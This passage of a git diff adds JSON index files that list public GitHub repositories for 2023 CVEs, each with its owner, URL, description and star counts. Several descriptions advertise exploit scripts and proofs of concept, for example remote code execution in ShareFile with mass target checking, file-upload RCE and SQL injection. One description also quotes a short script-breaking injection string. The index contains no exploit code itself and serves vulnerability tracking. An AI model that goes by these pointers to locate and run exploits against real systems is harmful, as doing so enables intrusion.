"owner": { + "login": "zwlsix", + "id": 88372814, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88372814?v=4", + "html_url": "https:\/\/github.com\/zwlsix", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zwlsix\/KeePass-CVE-2023-24055", + "description": "KeePass CVE-2023-24055复现", + "fork": false, + "created_at": "2023-02-14T05:20:58Z", + "updated_at": "2023-02-14T06:10:59Z", + "pushed_at": "2023-02-14T06:07:45Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-24059.json b/2023/CVE-2023-24059.json new file mode 100644 index 0000000000..4d430392c9 --- /dev/null +++ b/2023/CVE-2023-24059.json @@ -0,0 +1,33 @@ +[ + { + "id": 592223844, + "name": "CVE-2023-24059", + "full_name": "gmh5225\/CVE-2023-24059", + "owner": { + "login": "gmh5225", + "id": 13917777, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13917777?v=4", + "html_url": "https:\/\/github.com\/gmh5225", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gmh5225\/CVE-2023-24059", + "description": "Grand Theft Auto V for PC allows attackers to achieve partial remote code execution or modify files on a PC, as exploited in the wild in January 2023. CVE project by @Sn0wAlice", + "fork": false, + "created_at": "2023-01-23T08:48:08Z", + "updated_at": "2023-02-20T16:16:21Z", + "pushed_at": "2023-01-22T11:39:03Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-24078.json b/2023/CVE-2023-24078.json new file mode 100644 index 0000000000..3ea9d6763a --- /dev/null +++ b/2023/CVE-2023-24078.json @@ -0,0 +1,95 @@ +[ + { + "id": 654818931, + "name": "CVE-2023-24078", + "full_name": "overgrowncarrot1\/CVE-2023-24078", + "owner": { + "login": "overgrowncarrot1", + "id": 78485709, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78485709?v=4", + "html_url": "https:\/\/github.com\/overgrowncarrot1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/overgrowncarrot1\/CVE-2023-24078", + "description": "CVE-2023-24078 for FuguHub \/ BarracudaDrive", + "fork": false, + "created_at": "2023-06-17T03:39:35Z", + "updated_at": "2024-07-25T09:36:55Z", + "pushed_at": "2023-06-19T01:21:42Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 654914326, + "name": "CVE-2023-24078", + "full_name": "rio128128\/CVE-2023-24078", + "owner": { + "login": "rio128128", + "id": 136775778, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/136775778?v=4", + "html_url": "https:\/\/github.com\/rio128128", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rio128128\/CVE-2023-24078", + "description": "CVE-2023-24078 for FuguHub \/ BarracudaDrive", + "fork": false, + "created_at": "2023-06-17T10:11:24Z", + "updated_at": "2023-06-20T09:13:22Z", + "pushed_at": "2023-06-17T10:11:43Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 728491152, + "name": "CVE-2023-24078", + "full_name": "ag-rodriguez\/CVE-2023-24078", + "owner": { + "login": "ag-rodriguez", + "id": 55252902, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55252902?v=4", + "html_url": "https:\/\/github.com\/ag-rodriguez", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ag-rodriguez\/CVE-2023-24078", + "description": null, + "fork": false, + "created_at": "2023-12-07T03:45:27Z", + "updated_at": "2024-07-02T02:45:03Z", + "pushed_at": "2024-07-02T02:45:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-24100.json b/2023/CVE-2023-24100.json new file mode 100644 index 0000000000..08aa6e365f --- /dev/null +++ b/2023/CVE-2023-24100.json @@ -0,0 +1,33 @@ +[ + { + "id": 727552823, + "name": "CVE-2023-24100", + "full_name": "badboycxcc\/CVE-2023-24100", + "owner": { + "login": "badboycxcc", + "id": 72059221, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72059221?v=4", + "html_url": "https:\/\/github.com\/badboycxcc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/badboycxcc\/CVE-2023-24100", + "description": "nuclei templates CVE RCE CNVD IoT", + "fork": false, + "created_at": "2023-12-05T05:00:27Z", + "updated_at": "2023-12-30T06:44:58Z", + "pushed_at": "2023-12-06T13:48:06Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-24203.json b/2023/CVE-2023-24203.json new file mode 100644 index 0000000000..8e0f9ae7a1 --- /dev/null +++ b/2023/CVE-2023-24203.json @@ -0,0 +1,33 @@ +[ + { + "id": 800288554, + "name": "CVE-2023-24203-and-CVE-2023-24204", + "full_name": "momo1239\/CVE-2023-24203-and-CVE-2023-24204", + "owner": { + "login": "momo1239", + "id": 34490185, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34490185?v=4", + "html_url": "https:\/\/github.com\/momo1239", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/momo1239\/CVE-2023-24203-and-CVE-2023-24204", + "description": null, + "fork": false, + "created_at": "2024-05-14T03:53:03Z", + "updated_at": "2024-05-14T04:13:00Z", + "pushed_at": "2024-05-14T04:12:57Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-24249.json b/2023/CVE-2023-24249.json new file mode 100644 index 0000000000..2702a5cf15 --- /dev/null +++ b/2023/CVE-2023-24249.json @@ -0,0 +1,33 @@ +[ + { + "id": 839153746, + "name": "CVE-2023-24249-Exploit", + "full_name": "IDUZZEL\/CVE-2023-24249-Exploit", + "owner": { + "login": "IDUZZEL", + "id": 63135823, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63135823?v=4", + "html_url": "https:\/\/github.com\/IDUZZEL", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/IDUZZEL\/CVE-2023-24249-Exploit", + "description": "Exploit script for CVE-2023-24249 - a vulnerability allowing remote code execution via file upload and command injection.", + "fork": false, + "created_at": "2024-08-07T04:36:44Z", + "updated_at": "2024-11-20T16:31:00Z", + "pushed_at": "2024-08-07T04:41:25Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-24278.json b/2023/CVE-2023-24278.json new file mode 100644 index 0000000000..eed2d2c190 --- /dev/null +++ b/2023/CVE-2023-24278.json @@ -0,0 +1,33 @@ +[ + { + "id": 907385028, + "name": "CVE-2023-24278", + "full_name": "NeCr00\/CVE-2023-24278", + "owner": { + "login": "NeCr00", + "id": 36794189, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36794189?v=4", + "html_url": "https:\/\/github.com\/NeCr00", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/NeCr00\/CVE-2023-24278", + "description": "It was discovered two reflected cross site scripting (XSS) vulnerabilities in the Squidex open source headless CMS software. The Reflected Cross Site Scripting vulnerabilities affect all versions of Squidex prior to 7.4.0 and affect both authenticated and unauthenticated victim users.", + "fork": false, + "created_at": "2024-12-23T13:10:47Z", + "updated_at": "2025-01-02T11:05:14Z", + "pushed_at": "2024-12-23T13:22:22Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-24317.json b/2023/CVE-2023-24317.json new file mode 100644 index 0000000000..2ecb0c215a --- /dev/null +++ b/2023/CVE-2023-24317.json @@ -0,0 +1,33 @@ +[ + { + "id": 611463904, + "name": "CVE-2023-24317", + "full_name": "angelopioamirante\/CVE-2023-24317", + "owner": { + "login": "angelopioamirante", + "id": 38589929, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38589929?v=4", + "html_url": "https:\/\/github.com\/angelopioamirante", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/angelopioamirante\/CVE-2023-24317", + "description": "Judging Management System v1.0 - Unrestricted File Upload + RCE (Unauthenticated)", + "fork": false, + "created_at": "2023-03-08T22:00:44Z", + "updated_at": "2024-01-23T13:36:47Z", + "pushed_at": "2024-01-22T10:17:43Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-24329.json b/2023/CVE-2023-24329.json new file mode 100644 index 0000000000..fc1109f8f0 --- /dev/null +++ b/2023/CVE-2023-24329.json @@ -0,0 +1,95 @@ +[ + { + "id": 679660290, + "name": "CVE-2023-24329-PoC", + "full_name": "H4R335HR\/CVE-2023-24329-PoC", + "owner": { + "login": "H4R335HR", + "id": 121650077, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/121650077?v=4", + "html_url": "https:\/\/github.com\/H4R335HR", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/H4R335HR\/CVE-2023-24329-PoC", + "description": null, + "fork": false, + "created_at": "2023-08-17T10:33:52Z", + "updated_at": "2023-08-17T10:37:28Z", + "pushed_at": "2023-08-17T10:41:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 680228161, + "name": "CVE-2023-24329-codeql-test", + "full_name": "Pandante-Central\/CVE-2023-24329-codeql-test", + "owner": { + "login": "Pandante-Central", + "id": 128833419, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/128833419?v=4", + "html_url": "https:\/\/github.com\/Pandante-Central", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Pandante-Central\/CVE-2023-24329-codeql-test", + "description": null, + "fork": false, + "created_at": "2023-08-18T16:53:11Z", + "updated_at": "2023-08-18T16:55:17Z", + "pushed_at": "2023-08-18T17:34:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 795324648, + "name": "CVE-2023-24329-Exploit", + "full_name": "PenTestMano\/CVE-2023-24329-Exploit", + "owner": { + "login": "PenTestMano", + "id": 162714784, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/162714784?v=4", + "html_url": "https:\/\/github.com\/PenTestMano", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/PenTestMano\/CVE-2023-24329-Exploit", + "description": "Example of CVE-2023-24329 ", + "fork": false, + "created_at": "2024-05-03T03:16:02Z", + "updated_at": "2024-05-03T03:16:02Z", + "pushed_at": "2023-10-13T07:42:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-2437.json b/2023/CVE-2023-2437.json new file mode 100644 index 0000000000..3ac9567e3b --- /dev/null +++ b/2023/CVE-2023-2437.json @@ -0,0 +1,33 @@ +[ + { + "id": 766289815, + "name": "CVE-2023-2437", + "full_name": "RxRCoder\/CVE-2023-2437", + "owner": { + "login": "RxRCoder", + "id": 161977912, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/161977912?v=4", + "html_url": "https:\/\/github.com\/RxRCoder", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RxRCoder\/CVE-2023-2437", + "description": null, + "fork": false, + "created_at": "2024-03-02T21:09:07Z", + "updated_at": "2024-03-02T21:18:30Z", + "pushed_at": "2024-03-02T21:19:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-24488.json b/2023/CVE-2023-24488.json new file mode 100644 index 0000000000..43074865df --- /dev/null +++ b/2023/CVE-2023-24488.json @@ -0,0 +1,128 @@ +[ + { + "id": 661072883, + "name": "CVE-2023-24488-PoC", + "full_name": "SirBugs\/CVE-2023-24488-PoC", + "owner": { + "login": "SirBugs", + "id": 37689994, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37689994?v=4", + "html_url": "https:\/\/github.com\/SirBugs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SirBugs\/CVE-2023-24488-PoC", + "description": "CVE-2023-24488 PoC", + "fork": false, + "created_at": "2023-07-01T17:47:17Z", + "updated_at": "2024-11-16T19:54:52Z", + "pushed_at": "2023-07-01T17:49:16Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 662260047, + "name": "CVE-2023-24488", + "full_name": "securitycipher\/CVE-2023-24488", + "owner": { + "login": "securitycipher", + "id": 111536600, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/111536600?v=4", + "html_url": "https:\/\/github.com\/securitycipher", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/securitycipher\/CVE-2023-24488", + "description": "POC for CVE-2023-24488", + "fork": false, + "created_at": "2023-07-04T18:02:50Z", + "updated_at": "2024-11-14T08:33:30Z", + "pushed_at": "2023-07-04T18:39:03Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 13, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 663114176, + "name": "CVE-2023-24488-SIEM-Sigma-Rule", + "full_name": "NSTCyber\/CVE-2023-24488-SIEM-Sigma-Rule", + "owner": { + "login": "NSTCyber", + "id": 128680605, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/128680605?v=4", + "html_url": "https:\/\/github.com\/NSTCyber", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/NSTCyber\/CVE-2023-24488-SIEM-Sigma-Rule", + "description": "Detect CVE-2023-24488 Exploitation Attempts", + "fork": false, + "created_at": "2023-07-06T15:23:45Z", + "updated_at": "2024-04-20T01:39:03Z", + "pushed_at": "2023-07-06T16:32:44Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 672880378, + "name": "CVE-2023-24488", + "full_name": "raytheon0x21\/CVE-2023-24488", + "owner": { + "login": "raytheon0x21", + "id": 92903333, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/92903333?v=4", + "html_url": "https:\/\/github.com\/raytheon0x21", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/raytheon0x21\/CVE-2023-24488", + "description": "Tools to perform exploit CVE-2023-24488", + "fork": false, + "created_at": "2023-07-31T11:29:16Z", + "updated_at": "2023-08-27T15:14:52Z", + "pushed_at": "2023-07-31T11:37:58Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-24488" + ], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-24489.json b/2023/CVE-2023-24489.json new file mode 100644 index 0000000000..7de2ce2f5e --- /dev/null +++ b/2023/CVE-2023-24489.json @@ -0,0 +1,64 @@ +[ + { + "id": 665550383, + "name": "CVE-2023-24489-ShareFile", + "full_name": "adhikara13\/CVE-2023-24489-ShareFile", + "owner": { + "login": "adhikara13", + "id": 44716348, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44716348?v=4", + "html_url": "https:\/\/github.com\/adhikara13", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/adhikara13\/CVE-2023-24489-ShareFile", + "description": "This project is a Python script that exploits the CVE-2023-24489 vulnerability in ShareFile. It allows remote command execution on the target server. The script supports both Windows and Linux (On testing) platforms, and it can be used to exploit individual targets or perform mass checking on a list of URLs.", + "fork": false, + "created_at": "2023-07-12T13:01:33Z", + "updated_at": "2024-10-23T18:39:56Z", + "pushed_at": "2023-07-12T13:17:54Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 13, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 683690698, + "name": "CVE-2023-24489-poc", + "full_name": "whalebone7\/CVE-2023-24489-poc", + "owner": { + "login": "whalebone7", + "id": 125891350, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/125891350?v=4", + "html_url": "https:\/\/github.com\/whalebone7", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/whalebone7\/CVE-2023-24489-poc", + "description": "POC for CVE-2023-24489 with bash. ", + "fork": false, + "created_at": "2023-08-27T11:53:59Z", + "updated_at": "2023-10-22T21:09:08Z", + "pushed_at": "2023-08-27T11:59:59Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-24517.json b/2023/CVE-2023-24517.json new file mode 100644 index 0000000000..41f245c92e --- /dev/null +++ b/2023/CVE-2023-24517.json @@ -0,0 +1,33 @@ +[ + { + "id": 705272522, + "name": "CVE-2023-24517", + "full_name": "Argonx21\/CVE-2023-24517", + "owner": { + "login": "Argonx21", + "id": 30073895, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30073895?v=4", + "html_url": "https:\/\/github.com\/Argonx21", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Argonx21\/CVE-2023-24517", + "description": null, + "fork": false, + "created_at": "2023-10-15T14:55:12Z", + "updated_at": "2023-10-15T14:55:13Z", + "pushed_at": "2023-10-15T14:55:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-24538.json b/2023/CVE-2023-24538.json new file mode 100644 index 0000000000..ce2a3f2c8a --- /dev/null +++ b/2023/CVE-2023-24538.json @@ -0,0 +1,64 @@ +[ + { + "id": 698127324, + "name": "goIssue_dunfell", + "full_name": "skulkarni-mv\/goIssue_dunfell", + "owner": { + "login": "skulkarni-mv", + "id": 117360244, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/117360244?v=4", + "html_url": "https:\/\/github.com\/skulkarni-mv", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/skulkarni-mv\/goIssue_dunfell", + "description": "go CVE-2023-24538 patch issue resolver - Dunfell", + "fork": false, + "created_at": "2023-09-29T08:09:17Z", + "updated_at": "2023-09-29T08:20:21Z", + "pushed_at": "2023-10-04T05:29:12Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 698334254, + "name": "goIssue_kirkstone", + "full_name": "skulkarni-mv\/goIssue_kirkstone", + "owner": { + "login": "skulkarni-mv", + "id": 117360244, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/117360244?v=4", + "html_url": "https:\/\/github.com\/skulkarni-mv", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/skulkarni-mv\/goIssue_kirkstone", + "description": "go CVE-2023-24538 patch issue resolver - Kirkstone", + "fork": false, + "created_at": "2023-09-29T17:18:42Z", + "updated_at": "2023-09-29T17:22:44Z", + "pushed_at": "2023-09-29T17:23:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-24610.json b/2023/CVE-2023-24610.json new file mode 100644 index 0000000000..77138ec160 --- /dev/null +++ b/2023/CVE-2023-24610.json @@ -0,0 +1,33 @@ +[ + { + "id": 595331354, + "name": "CVE-2023-24610", + "full_name": "abbisQQ\/CVE-2023-24610", + "owner": { + "login": "abbisQQ", + "id": 21143253, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21143253?v=4", + "html_url": "https:\/\/github.com\/abbisQQ", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/abbisQQ\/CVE-2023-24610", + "description": "This is a proof of concept for CVE-2023-24610", + "fork": false, + "created_at": "2023-01-30T21:33:46Z", + "updated_at": "2023-07-14T01:02:42Z", + "pushed_at": "2023-02-01T16:02:35Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-24706.json b/2023/CVE-2023-24706.json new file mode 100644 index 0000000000..d0ea83d682 --- /dev/null +++ b/2023/CVE-2023-24706.json @@ -0,0 +1,33 @@ +[ + { + "id": 716903745, + "name": "CVE-2023-24706", + "full_name": "hatjwe\/CVE-2023-24706", + "owner": { + "login": "hatjwe", + "id": 42887236, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42887236?v=4", + "html_url": "https:\/\/github.com\/hatjwe", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hatjwe\/CVE-2023-24706", + "description": "CVE-2023-24706", + "fork": false, + "created_at": "2023-11-10T05:43:52Z", + "updated_at": "2023-11-10T05:50:25Z", + "pushed_at": "2023-11-10T05:50:21Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-24709.json b/2023/CVE-2023-24709.json new file mode 100644 index 0000000000..0a51bb46fd --- /dev/null +++ b/2023/CVE-2023-24709.json @@ -0,0 +1,39 @@ +[ + { + "id": 593598818, + "name": "Injection-vulnerability-in-Paradox-Security-Systems-IPR512-CVE-2023-24709-PoC", + "full_name": "DRAGOWN\/Injection-vulnerability-in-Paradox-Security-Systems-IPR512-CVE-2023-24709-PoC", + "owner": { + "login": "DRAGOWN", + "id": 76569084, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76569084?v=4", + "html_url": "https:\/\/github.com\/DRAGOWN", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DRAGOWN\/Injection-vulnerability-in-Paradox-Security-Systems-IPR512-CVE-2023-24709-PoC", + "description": "In Paradox Security System IPR512 Web console login form page, attacker can input JavaScript string, such as \"<\/script>\" that will overwrite configurations in the file \"login.xml\" and cause the login page to crash. ", + "fork": false, + "created_at": "2023-01-26T12:13:51Z", + "updated_at": "2023-04-09T12:35:32Z", + "pushed_at": "2023-04-09T12:34:56Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2023-24709", + "paradox", + "security", + "systems" + ], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-24749.json b/2023/CVE-2023-24749.json new file mode 100644 index 0000000000..0ad1787817 --- /dev/null +++ b/2023/CVE-2023-24749.json @@ -0,0 +1,36 @@ +[ + { + "id": 606593182, + "name": "netgear-pwnagent", + "full_name": "mahaloz\/netgear-pwnagent", + "owner": { + "login": "mahaloz", + "id": 21327264, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21327264?v=4", + "html_url": "https:\/\/github.com\/mahaloz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mahaloz\/netgear-pwnagent", + "description": "An exploit PoC for CVE-2023-24749, aka PwnAgent", + "fork": false, + "created_at": "2023-02-26T00:16:35Z", + "updated_at": "2024-01-28T13:11:38Z", + "pushed_at": "2023-03-11T01:01:45Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "0day-exploit", + "netgear" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-24775.json b/2023/CVE-2023-24775.json new file mode 100644 index 0000000000..678b437790 --- /dev/null +++ b/2023/CVE-2023-24775.json @@ -0,0 +1,33 @@ +[ + { + "id": 622888276, + "name": "CVE-2023-24775-and-CVE-2023-24780", + "full_name": "csffs\/CVE-2023-24775-and-CVE-2023-24780", + "owner": { + "login": "csffs", + "id": 108768133, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108768133?v=4", + "html_url": "https:\/\/github.com\/csffs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/csffs\/CVE-2023-24775-and-CVE-2023-24780", + "description": "my python poc CVE-2023-24774 and CVE-2023-24775 this sqli cve funadmin", + "fork": false, + "created_at": "2023-04-03T09:11:04Z", + "updated_at": "2023-05-09T10:32:10Z", + "pushed_at": "2023-04-03T09:37:24Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-24871.json b/2023/CVE-2023-24871.json new file mode 100644 index 0000000000..ab7502a68e --- /dev/null +++ b/2023/CVE-2023-24871.json @@ -0,0 +1,33 @@ +[ + { + "id": 818310581, + "name": "CVE-2023-24871", + "full_name": "ynwarcs\/CVE-2023-24871", + "owner": { + "login": "ynwarcs", + "id": 108408574, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108408574?v=4", + "html_url": "https:\/\/github.com\/ynwarcs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ynwarcs\/CVE-2023-24871", + "description": "pocs & exploit for CVE-2023-24871 (rce + lpe)", + "fork": false, + "created_at": "2024-06-21T15:01:15Z", + "updated_at": "2025-01-06T14:33:13Z", + "pushed_at": "2024-07-17T12:34:16Z", + "stargazers_count": 46, + "watchers_count": 46, + "has_discussions": false, + "forks_count": 14, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 14, + "watchers": 46, + "score": 